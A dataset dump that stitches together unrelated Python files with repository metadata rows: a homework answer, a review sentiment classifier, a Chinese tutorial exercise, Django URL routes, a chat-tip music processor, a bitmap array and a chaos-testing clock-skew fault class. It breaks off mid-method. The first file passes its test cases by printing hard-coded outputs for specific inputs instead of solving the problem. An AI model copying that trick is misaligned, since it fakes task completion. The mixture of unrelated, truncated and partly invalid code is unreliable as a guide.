"33094578+coolreader18@users.noreply.github.com"
] |
33094578+coolreader18@users.noreply.github.com
|
83fef1df13d09343fd01f3337ac2d6bbc7f03c8d
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2618/60895/291182.py
|
ab6450cf38238d5387e2704d4907b7d62fce72fb
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
t=int(input())
while t>0:
t=t-1
n=int(input())
s=input()
if s=='2 3 1' or s=='2 1 3':
print(1)
elif s=='4 3 1 2' or s=='2':
print(2)
else:
print(s)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
bb193411404a76d20eab28cfba5c7e4677608ff5
|
d4f3872f60d3193708afa996f557ff72de2352ed
|
/merchandise-recommendations/final_merchandise/sentiment_analysis.py
|
af2e2ef7820fcf1323dc0eab1b2794e8593d4764
|
[] |
no_license
|
shikhar1sharma/Recommendation-System
|
dcfc925ff6db6eb827a38ae919cf38b34001d0f1
|
6af5d0937bd5ef14748e67eec0a8e64c9ce91ec3
|
refs/heads/master
| 2020-03-28T18:55:38.639989
| 2018-12-23T02:30:32
| 2018-12-23T02:30:32
| 148,927,614
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,443
|
py
|
# This file is for the sentiment analysis for the reviews for merchandise data, for clothing, jwellery and gifts dataset.
import sqlite3
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import re
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn import metrics
from sklearn.metrics import roc_curve, auc
from sklearn.naive_bayes import MultinomialNB
from sklearn.naive_bayes import BernoulliNB
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from wordcloud import WordCloud, STOPWORDS
con = sqlite3.connect('merchandise_dataset.db')
stopwords = set(STOPWORDS)
def cleanReviews(text):
regEx = re.compile('[^a-z]+')
text = text.lower()
text = regEx.sub(' ', text).strip()
return text
def bool_to_int(x):
if x == 'negative':
return 0
return 1
def show_wc(data, title = None):
wc = WordCloud(background_color='white', stopwords=stopwords, max_words=200, max_font_size=40, scale=3, random_state=1).generate(str(data))
figure = plt.figure(1, figsize=(8, 8))
plt.axis('off')
if title:
figure.suptitle(title, fontsize=20)
figure.subplots_adjust(top=2.3)
plt.imshow(wc)
plt.show()
def getSentiment(countVector, tfidf_transformer, model, review):
transformed_count = countVector.transform([review])
transformed_tf_idf = tfidf_transformer.transform(transformed_count)
result = model.predict(transformed_tf_idf)[0]
prob = model.predict_proba(transformed_tf_idf)[0]
print("Sample estimated as %s: negative probability %f, positive probability %f" % (result.upper(), prob[0], prob[1]))
reviews = pd.read_sql_query(""" SELECT overall, summary, helpful, total FROM amazonReviews WHERE overall != 3""", con)
# Set the sentiment
reviews["sentiment"] = reviews["overall"].apply(lambda score: "positive" if score > 3 else "negative")
# Set the usefulness score
reviews["usefulScore"] = (reviews["helpful"]/reviews["total"]).apply(lambda n: "useful" if n > 0.8 else "useless")
# Clean the review texts
reviews["summaryClean"] = reviews["summary"].apply(cleanReviews)
# 80% train and 20% test
train, test = train_test_split(reviews, test_size=0.2)
# Get the frequency of each word ngram model
countVector = CountVectorizer(min_df = 1, ngram_range = (1, 4))
X_train_counts = countVector.fit_transform(train["summaryClean"])
#applying tf-idf to the count vector model
tfidf_transformer = TfidfTransformer()
X_train = tfidf_transformer.fit_transform(X_train_counts)
X_test_vector = countVector.transform(test["summaryClean"])
X_test = tfidf_transformer.transform(X_test_vector)
y_train = train["sentiment"]
y_test = test["sentiment"]
pred = dict()
mpl.rcParams['font.size']=12
mpl.rcParams['savefig.dpi']=100
mpl.rcParams['figure.subplot.bottom']=.1
show_wc(reviews["summaryClean"])
show_wc(reviews[reviews.overall == 1]["summaryClean"]) # low scored
show_wc(reviews[reviews.overall == 5]["summaryClean"]) # high scored
show_wc(reviews[reviews.overall == 2]["summaryClean"]) # average scored
model = MultinomialNB().fit(X_train, y_train)
pred['Multinomial'] = model.predict(X_test)
model = BernoulliNB().fit(X_train, y_train)
pred['Bernoulli'] = model.predict(X_test)
l_reg = LogisticRegression(C=1e5)
l_reg_result = l_reg.fit(X_train, y_train)
pred['Logistic'] = l_reg.predict(X_test)
vfunc = np.vectorize(bool_to_int)
idx = 0
colors = ['b', 'g', 'y', 'm', 'k']
for model, predicted in pred.items():
fp_rate, tp_rate, thresholds = roc_curve(y_test.map(bool_to_int), vfunc(predicted))
roc_auc = auc(fp_rate, tp_rate)
plt.plot(fp_rate, tp_rate, colors[idx], label='%s: AUC %0.2f'% (model,roc_auc))
idx += 1
plt.title('Classifiers comparaison with ROC')
plt.legend(loc='lower right')
plt.plot([0,1],[0,1],'r--')
plt.xlim([-0.1,1.2])
plt.ylim([-0.1,1.2])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.show()
print(metrics.classification_report(y_test, pred['Logistic'], target_names = ["positive", "negative"]))
'''
precision recall f1-score support
positive 0.78 0.70 0.74 5291
negative 0.97 0.98 0.97 44360
avg / total 0.94 0.95 0.95 49651
'''
print(accuracy_score(y_test, pred['Bernoulli'])) # 0.897383738495
print(accuracy_score(y_test, pred['Multinomial'])) # 0.915188012326
print(accuracy_score(y_test, pred['Logistic'])) # 0.946708021994
features = countVector.get_feature_names()
feature_coefs = pd.DataFrame( data = list(zip(features, l_reg_result.coef_[0])), columns = ['feature', 'coefficient'] )
print(feature_coefs.sort_values(by='coefficient')) # [537027 rows x 2 columns]
getSentiment(countVector, tfidf_transformer, l_reg, "Heavenly Highway Hymns")
# Sample estimated as POSITIVE: negative probability 0.001339, positive probability 0.998661
getSentiment(countVector, tfidf_transformer, l_reg, "Very oily and creamy. Not at all what I expected... it just looked awful!!! Plus, took FOREVER to arrive.")
# Sample estimated as NEGATIVE: negative probability 0.997464, positive probability 0.002536
getSentiment(countVector, tfidf_transformer, l_reg, "Weird smelling shampoo!.")
# Sample estimated as NEGATIVE: negative probability 0.859040, positive probability 0.140960
con.close()
|
[
"ggirira2@asu.edu"
] |
ggirira2@asu.edu
|
513c7864b967cb790d4599b16d3871075bbafac0
|
e070096e1c0a2e1bc37757ed7c30688f35fdc2e8
|
/Python-day2/mypyapp02/2.py
|
0d5eacf3a4af832cdb660e0e0a43d6d3bfe82c03
|
[] |
no_license
|
una-sara/python
|
bfe9586da26f69834d1757f116ec340b23f89ce9
|
177fd603e9ced430f419f1a69a5d7bdba747a944
|
refs/heads/master
| 2021-05-22T18:12:54.436850
| 2020-04-06T13:51:00
| 2020-04-06T13:51:00
| 253,034,405
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
'''
练习:创建变量表示用户的积分,如果达到了10000分,输出"黑金用户"; 否则如果达到了5000分,输出"黄金用户"; 否则如果达到1000分,输出"白银用户"; 否则输出"普通用户"
'''
#score = 30000
#score = 8000
#score = 2000
score = 200
if(score>=10000):
print('黑金用户')
elif(score>=5000):
print('黄金用户')
elif(score>=1000):
print('白银用户')
else:
print('普通用户')
print('程序运行结束')
|
[
"1527296894@qq.com"
] |
1527296894@qq.com
|
c5afaa2e84fa29e5ab2ebdf6d8bad5d14b00c86e
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_Quantization/trend_ConstantTrend/cycle_12/ar_/test_artificial_1024_Quantization_ConstantTrend_12__0.py
|
8099a2bf0f032e0aa56a37bec74624f179bb330f
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219
| 2023-07-28T20:15:53
| 2023-07-28T20:15:53
| 70,790,978
| 457
| 77
|
BSD-3-Clause
| 2023-03-08T21:45:40
| 2016-10-13T09:30:30
|
Python
|
UTF-8
|
Python
| false
| false
| 272
|
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 0, ar_order = 0);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
4212c96c2d4a54c3fea87291044f58585ec4539f
|
394f29f04a8d786e9e92ecff6a71613a8b68aac1
|
/My_Blog_Project/urls.py
|
d0329d0ef6fb2fd6d7e509c3b4e6eeec964d448d
|
[] |
no_license
|
hasnatul/CSE327_Project
|
f65f309460b2461327df964512b66d846b7dc25a
|
37f37ce5713c6189e625b8e181d4facee8ef9418
|
refs/heads/master
| 2022-12-24T10:08:27.961902
| 2020-09-27T11:21:17
| 2020-09-27T11:21:17
| 299,011,592
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
from django.contrib import admin
from django.urls import path, include
from . import views
from django.conf import settings
from django.contrib.staticfiles.urls import static, staticfiles_urlpatterns
urlpatterns = [
path('admin/', admin.site.urls),
path('account/', include('App_Login.urls')),
path('blog/', include('App_Blog.urls')),
path('', views.Index, name='index'),
]
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"noreply@github.com"
] |
hasnatul.noreply@github.com
|
db6ce37579d5c07f61e8b4a4197f106ecf688cc5
|
2293c76c3d18e2fcd44ded90bd40113d26285663
|
/pyeccodes/defs/mars/grib_efhs_cd_def.py
|
7454080db49fb1b562273035d3aeca6265c63663
|
[
"Apache-2.0"
] |
permissive
|
ecmwf/pyeccodes
|
b1f121dbddf68d176a03805ed5144ba0b37ac211
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
refs/heads/master
| 2022-04-23T10:37:40.524078
| 2020-04-18T06:30:29
| 2020-04-18T06:30:29
| 255,554,540
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
import pyeccodes.accessors as _
def load(h):
h.alias('mars.step', 'stepRange')
h.alias('mars.quantile', 'quantile')
|
[
"baudouin.raoult@ecmwf.int"
] |
baudouin.raoult@ecmwf.int
|
6562c268a31325ccceab788846c67be462dab3ae
|
5c12ab4630086e389354277bb1716b82468be42e
|
/mrunal.py
|
882dd98cfe9f389c6d1c47c30d11ce6dcbdc7126
|
[] |
no_license
|
mrunal736/msj-leetcodeprblms
|
743d76f491cb3f749abbd1f3fabd7f13c5b81671
|
4c70dade61ddb760b531ac80918dbc65cbaaddd1
|
refs/heads/main
| 2023-06-20T21:46:07.322995
| 2021-07-16T14:44:19
| 2021-07-16T14:44:19
| 386,318,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 72
|
py
|
print("I am Mrunal Jambenal,A first year computer Engineering student")
|
[
"noreply@github.com"
] |
mrunal736.noreply@github.com
|
973972be69150ba2670e4c6c04896666b021944f
|
0052545f09c81b8d6720163213653260829b15bd
|
/algo/music_processor.py
|
7234dfe69a1fa506046cdf6ae451455354a3b7e2
|
[] |
no_license
|
mashaka/AIBarney
|
76f4cc574e24c5e77c86209ca413490a00480beb
|
609986096b22cf774ef714fba184614f5bbc88f6
|
refs/heads/master
| 2021-01-20T06:38:16.177022
| 2017-10-22T17:56:50
| 2017-10-22T17:56:50
| 83,876,419
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,334
|
py
|
from typing import List, Dict
from .intersection import Intersection
from .tip import Tip
import random
from datetime import datetime
from .content import Content, ContentType
from enum import Enum, unique
from .tools import UpdateType
def performerTipString(data, tipBegin, tipEnd):
performerName = data["name"]
return tipBegin + " " + performerName + tipEnd
def getCoverUrl(data):
pictureUrl = None
if "cover" in data:
pictureUrl = data["cover"]["source"]
return pictureUrl
def findNearestEvent(data):
if not "events" in data:
return None
events = data["events"]["data"]
now = datetime.now()
for i in range(len(events) - 1, 0, -1):
event = events[i]
start = datetime.strptime(event["start_time"][:-6], '%Y-%m-%dT%H:%M:%S')
if start > now:
return event
return None
MINIMAL_MUSIC_LIKES = 20
suggestCommonArtistWeight = 0.5
suggestCommonGenreWeight = 0.3
@unique
class QuestionType(Enum):
GENERAL_MUSIC_QUESTION = 1,
SPECIFIC_GENERAL_QUESTION = 2,
PERFORMER_LIKING_QUESTION = 3,
SPECIFIC_PERFORMER_QUESTION = 4,
ASK_PERFORMER_EVENT = 5,
GENRE_SUGGEST_ANOTHER = 6
class MusicProccessor:
def __init__( self, firstData, secondData):
self.music_confidence = 0.5
self.abusiveLoveToMusicsDefaultWeight = 0.1
firstDataList = firstData["data"]
secondDataList = secondData["data"]
firstIds = set( map( lambda x: x["id"], firstDataList ) )
secondIds = set( map( lambda x: x["id"], secondDataList ) )
firstGenres = set( map( lambda x: x["genre"] if "genre" in x else None, firstDataList) )
secondGenres = set( map( lambda x: x["genre"] if "genre" in x else None, secondDataList ) )
intersectionIds = firstIds & secondIds
intersectionGenres = firstGenres & secondGenres
self.firstData = firstDataList
self.secondData = secondDataList
self.commonPerformers = []
self.genreToPerformersLists = dict()
for genre in intersectionGenres:
if genre:
self.genreToPerformersLists[genre] = [[], []]
self.performersWeights = dict()
for data in firstDataList:
if data["id"] in intersectionIds:
self.commonPerformers.append( data )
self.performersWeights[data["id"]] = 0.5
if "genre" in data and data["genre"] in intersectionGenres:
self.genreToPerformersLists[data["genre"]][0].append( data )
for data in secondDataList:
if "genre" in data and data["genre"] in intersectionGenres:
self.genreToPerformersLists[data["genre"]][1].append( data )
self.idToType = dict()
self.idToPerformer = dict()
self.lastTipId = -1
self.process1()
def process1(self):
if self.music_confidence == 0:
return []
intersections = []
if self.abusiveLoveToMusicsDefaultWeight > 0:
firstTip = Tip( "I have seen a lot of likes on your facebook page. Do you actually like hearing musics?",
self.abusiveLoveToMusicsDefaultWeight )
self.idToType[firstTip.id] = QuestionType.GENERAL_MUSIC_QUESTION
secondTip = Tip( "You seem to love musics, there are huge amount of likes on your facebook page. What is your favourite band?",
self.abusiveLoveToMusicsDefaultWeight )
self.idToType[secondTip.id] = QuestionType.SPECIFIC_GENERAL_QUESTION
if len( self.firstData ) > MINIMAL_MUSIC_LIKES and len( self.secondData ) > MINIMAL_MUSIC_LIKES:
intersections.append( Intersection( "Abusive love to musics",
self.abusiveLoveToMusicsDefaultWeight, (None, None),
[
firstTip,
secondTip
] ) )
for data in self.commonPerformers:
id = data["id"]
print( id )
print( self.performersWeights[id] )
if self.performersWeights[id] < 0.5:
continue
pictureUrl = getCoverUrl( data )
confirmMutiallyLikingPerformerTip = performerTipString( data,
"You seem to hear music a lot. Do you actually like", " songs?")
askAboutFavouritePerformerSongTip = performerTipString( data,
"You seem to like", " musics. What is your favorite song?" )
tip1 = Tip( confirmMutiallyLikingPerformerTip, 0.9 )
self.idToType[tip1.id] = QuestionType.PERFORMER_LIKING_QUESTION
tip2 = Tip( askAboutFavouritePerformerSongTip, 0.7 )
self.idToType[tip2.id] = QuestionType.SPECIFIC_PERFORMER_QUESTION
self.idToPerformer[tip1.id] = id
self.idToPerformer[tip2.id] = id
event = findNearestEvent( data )
print(event)
tipsList = [ tip1, tip2 ]
if self.performersWeights[id] > 0.6 and event:
loc = ""
if "city" in event["place"]["location"]:
loc = " in " + event["place"]["location"]["city"]
elif "county" in event["place"]["location"]:
loc = " in " + event["place"]["location"]["country"]
goToEventSuggesion = "Hey, you like " + data["name"] \
+ ". There will be " + event["name"] + "at " + event["place"]["name"]\
+ loc + "." + " Do you mind going together?"
tip3 = Tip( goToEventSuggesion, 0.5 )
self.idToType[tip3.id] = QuestionType.ASK_PERFORMER_EVENT
self.idToPerformer[tip3.id] = id
tipsList.append( tip3 )
intersections.append( Intersection( performerTipString( data, "Like music of", "" ),
suggestCommonArtistWeight, ( Content( ContentType.IMAGE_URL, pictureUrl ), None), tipsList ) )
print( tipsList )
for genre, performersPair in self.genreToPerformersLists.items():
firstList = performersPair[0]
secondList = performersPair[1]
firstElement = random.choice( firstList )
secondElement = random.choice( secondList )
firstUrl = getCoverUrl( firstElement )
secondUrl = getCoverUrl( secondElement )
firstName = firstElement["name"]
secondName = secondElement["name"]
if firstName != secondName:
text = "Looks like you are listening to " + genre + " music. I also do. Have you heard about " \
+ secondName + "?"
tip = Tip( text, 1.0 )
self.idToType[tip.id] = QuestionType.GENRE_SUGGEST_ANOTHER
intersections.append( Intersection( "Like music of " + genre + ": " + firstName + ", " + secondName,
suggestCommonGenreWeight, (
Content( ContentType.IMAGE_URL, firstUrl ),
Content( ContentType.IMAGE_URL, secondUrl ) ),
[ tip ] ) )
self.inters = intersections
def process(self):
return self.inters
def update(self, data, nlpInfo):
print( self.idToType )
if UpdateType.DELETE_TIP == data.type:
id = data.tip_id
if id in self.idToType:
print( "Delete " + str( id ) )
tp = self.idToType[id]
if tp == QuestionType.GENERAL_MUSIC_QUESTION or tp == QuestionType.SPECIFIC_GENERAL_QUESTION:
self.abusiveLoveToMusicsDefaultWeight = 0.0
else:
performer = self.idToPerformer[id]
self.performersWeights[performer] = 0.0
elif UpdateType.INCOME_MSG == data.type:
flag = nlpInfo.is_positive
print( self.performersWeights )
print(flag)
if data.msg == "Yes":
flag = True
if data.msg == "No":
flag = False
print(self.lastTipId)
if self.lastTipId != -1 and self.lastTipId in self.idToType:
tp = self.idToType[self.lastTipId]
if tp == QuestionType.GENERAL_MUSIC_QUESTION:
if flag == True:
self.music_confidence = 1.0
elif flag == False:
self.music_confidence = 0.0
if tp == QuestionType.PERFORMER_LIKING_QUESTION or tp == QuestionType.SPECIFIC_PERFORMER_QUESTION:
if flag == True:
self.performersWeights[ self.idToPerformer[self.lastTipId] ] = 1.0
elif flag == False:
self.performersWeights[ self.idToPerformer[self.lastTipId] ] = 0.0
if tp == QuestionType.GENERAL_MUSIC_QUESTION or tp == QuestionType.SPECIFIC_GENERAL_QUESTION:
self.abusiveLoveToMusicsDefaultWeight = 0.0
print( self.performersWeights )
elif UpdateType.OUTCOME_MSG == data.type:
pass
elif UpdateType.OUTCOME_TIP_MSG == data.type:
self.lastTipId = data.tip_id
self.process1()
|
[
"aleksejzuravlev@MacBook-Aleksej.local"
] |
aleksejzuravlev@MacBook-Aleksej.local
|
3b8f140a37c4d7ec791530c2bab613446afc7ba6
|
8015f1c62a2cb4efd21aa8938336913bf8117868
|
/bamap/ba2004.pngMap.py
|
606da98a32c0cbc92bb93493e35a6e3aab1839af
|
[] |
no_license
|
GamerNoTitle/Beepers-and-OLED
|
675b5e3c179df0f0e27b42bf594c43860d03b9af
|
afe1340e5394ae96bda5f9022a8a66824368091e
|
refs/heads/master
| 2020-04-20T00:09:47.122471
| 2019-04-29T04:59:35
| 2019-04-29T04:59:35
| 168,515,579
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,468
|
py
|
ba2004.pngMap = [
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000111111111111111',
'00100000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000001100000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000010000000000000001000000000000000000000000000100000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000010000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000001111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000001111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000000000001111111111111111111111',
]
|
[
"bili33@87ouo.top"
] |
bili33@87ouo.top
|
1f9e41df4cb178c1b0df2de1f4cb5f9dca1668e6
|
df52201219c5ccc4a0a4cd31ca63ef4532e0bfad
|
/Chapter5/Practice 5-1.py
|
4cf68b972114027f0273a400fa88567bb7e1dee9
|
[] |
no_license
|
Wiilz/Python-learning
|
7ac9ab2f3d1844505545a2b79d16324765cd23a4
|
aaeff2b04c7492463af43d9e921d7b1fd6e72cc1
|
refs/heads/master
| 2021-01-01T04:41:45.392318
| 2018-04-25T15:19:11
| 2018-04-25T15:19:11
| 97,226,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 60
|
py
|
surname = 'W'
name = 'L Z'
print "My name is",surname,name
|
[
"weiliangze@vip.qq.com"
] |
weiliangze@vip.qq.com
|
a85dbcfc2e92bd6e5126aad546f04d9e46064802
|
ec65e4109a2c89021a5cfc9f016f582512f2ec47
|
/accounting/urls.py
|
82a3ea055ed5a3aa28e283bba4ff8d1c8a88a367
|
[] |
no_license
|
numan98khan/django-school-management
|
c048067a814787c9d272745264891ecb5e6ee370
|
6e4b8013f7261f2694d013bda9999bb47cfe8b31
|
refs/heads/master
| 2022-05-01T01:29:45.294035
| 2020-01-10T11:01:02
| 2020-01-10T11:01:02
| 232,884,590
| 0
| 0
| null | 2022-04-22T22:59:01
| 2020-01-09T19:10:47
|
Python
|
UTF-8
|
Python
| false
| false
| 675
|
py
|
# Copyright (c) 2015-2019 Data King Ltd
# See LICENSE file for license details
from django.conf.urls import *
from accounting.views import *
app_name = 'accounting'
urlpatterns = (
url(
r'^account_chart/(?P<fy>\w+)/$',
AccountChartView.as_view(),
name='account_chart'
),
url(
r'^general-ledger/(?P<fy>\w+)/$',
GeneralLedgerView.as_view(),
name='general_ledger'
),
url(
r'^general-journal/(?P<fy>\w+)/$',
JournalView.as_view(),
name='general_journal'
),
url(
r'^journal/(?P<fy>\w+)/(?P<code>[^/]+)/$',
JournalView.as_view(),
name='journal'
)
)
|
[
"numan98khan@gmail.com"
] |
numan98khan@gmail.com
|
cd93efb9b02731868665558f6d1fdbf55006f759
|
d4f6ab598aa54195db8c9140d227be77d8ec343e
|
/mangle-infra-agent/Faults/ClockSkewFault.py
|
a7529c14df88dcf5cff32ec14d16bf770d040a57
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
James-libangjian/mangle
|
956a94f90dc2a3ff4e5d5b352e25a8c57acb5cfb
|
f5012f4cfecfd8c8a9248159bcfc9423bd632f5d
|
refs/heads/master
| 2023-08-21T13:26:36.776623
| 2021-09-20T05:43:10
| 2021-09-20T05:43:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,614
|
py
|
from Faults import InfraFault
from Faults import FaultStatus
from multiprocessing import Process
import time
import psutil
import sys
import subprocess
import distro
import datetime
import logging
log = logging.getLogger("python_agent")
class ClockSkewFault(InfraFault.InfraFault):
def __init__(self, fault_args):
super().__init__(fault_args)
self.processes = []
self.stop_cmd=""
self.remediate_cmd = ""
self.status_cmd = ""
self.time_before_injection=''
self.option=""
def prereq_check(self):
pre_req_error_msg = ''
dist = distro.linux_distribution(full_distribution_name=False)[0]
log.info("distro:{}".format(str(distro.linux_distribution(full_distribution_name=False))))
log.info("distro:{}".format(str(dist)))
if 'ubuntu' in dist:
self.stop_cmd = 'service ntp stop'
self.remediate_cmd = 'service ntp restart'
self.status_cmd = "service ntp status"
elif 'centos' in dist or 'rhel' in dist:
self.stop_cmd = "service ntpd stop"
self.remediate_cmd = "service ntpd restart"
self.status_cmd = "service ntpd status"
elif 'fedora' in dist or 'sles' in dist:
self.stop_cmd = "systemctl stop ntpd"
self.remediate_cmd = "systemctl restart ntpd"
self.status_cmd = "systemctl status ntpd"
elif 'photon' in dist:
self.stop_cmd = "systemctl stop systemd-timesyncd"
self.remediate_cmd = "systemctl restart systemd-timesyncd"
self.status_cmd = "systemctl status systemd-timesyncd --no-pager"
else:
log.info("Mangle doesn't support TimesSkew on the provided OS.")
pre_req_error_msg = 'Mangle does not support TimesSkew on the provided OS.,'
if len(self.status_cmd) != 0:
status_res_code = subprocess.call(self.status_cmd,shell=True)
if status_res_code != 0:
pre_req_error_msg = pre_req_error_msg + "NTP is not configured on the system"
if self.fault_args.get("--type") == "FUTURE":
self.option = "+"
elif self.fault_args.get("--type") == "PAST":
self.option = "-"
else:
pre_req_error_msg += "Wrong type argument provided"
if len(pre_req_error_msg) > 0:
return pre_req_error_msg
def get_status(self, fault_id):
if self.faultinfo.status == FaultStatus.FaultStatus.COMPLETED.name:
return self.faultinfo.status
